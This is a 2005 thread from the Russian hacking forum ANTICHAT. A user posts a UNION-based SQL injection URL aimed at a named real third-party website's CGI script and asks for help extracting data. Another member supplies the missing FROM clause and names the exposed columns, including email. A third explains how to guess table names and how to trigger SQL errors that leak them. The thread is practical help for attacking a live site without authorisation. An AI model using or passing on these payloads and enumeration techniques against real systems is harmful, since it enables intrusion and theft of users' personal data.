HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > ПРОГРАММИРОВАНИЕ > PHP
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

sql-inj
  #1  
Старый 31.07.2005, 19:19
Майор
Постоянный
Регистрация: 24.10.2004
Сообщений: 578
С нами: 11338946

Репутация: 300


По умолчанию sql-inj

http://club.germany.ru/cgi-bin/discount/hyperseek.cgi?detail=123+UNION+SELECT+'test1','tes t2','test3','test4','null','test6','test7','test8' ,'TUT','test10','test11','test12','test13','test14 ','test15','test16','test17','test18','test19','te st20','test21','test22','test22','test23','test24' ,'test25',null,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null/*

Подскажите, чёт у меня не получается, union я так понял работате, немогу найти ни одной таблицы...
но у меня не получается даже столбец с id вывести из известной таблицы "hyperseek_links" .... в чё моя ощибка ?
 
Ответить с цитированием

  #2  
Старый 31.07.2005, 22:57
ShAnKaR
Постоянный
Регистрация: 14.07.2005
Сообщений: 964
С нами: 10960226

Репутация: 1424


По умолчанию

.........FROM hyperseek_links /*
и всё ok
колонки: id,name,email
есть таблица location

Последний раз редактировалось ShAnKaR; 31.07.2005 в 23:55..
 
Ответить с цитированием

  #3  
Старый 01.08.2005, 00:48
Майор
Постоянный
Регистрация: 24.10.2004
Сообщений: 578
С нами: 11338946

Репутация: 300


По умолчанию

спасибо =)
чёт я стормозил...
ещё такой вопрос : других способов кроме как угадать имена таблиц и столбцов не существует ?
 
Ответить с цитированием

  #4  
Старый 01.08.2005, 13:28
Zadoxlik
Постоянный
Регистрация: 28.02.2005
Сообщений: 853
С нами: 11156006

Репутация: 749


По умолчанию

Анализ сайта. Если известно имя одной таблицы можно попробовать подобрать имя другой с бОльшими шансами на успех. Скажем префикс hyperseek тоже говорит о том что скорее всего он будет и в другой таблице, во всяком случае уже известно что автор любит делать имена таблиц с префиксами.

Так же иногда можно увидеть имя таблицы в префиксе передаваемой переменной (просто автору скрипта так было удобнее, не знаю почему). Скажем вызывается новость таким способом ?news_id=45. Мало того, что очень часто news_id - то поле в таблице новостей, так еще иногда случается и такое, что news - это имя самой таблицы.

Зачастую имя таблицы можно увидеть вызвав ошибку SQL запроса даже если SQL-инъекцию провести не удастся (можно вызвать ошибку, однако сделать какой-то человеческий запрос не позволит скрпт, который как-то по кривому рубит передаваемую переменную).
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.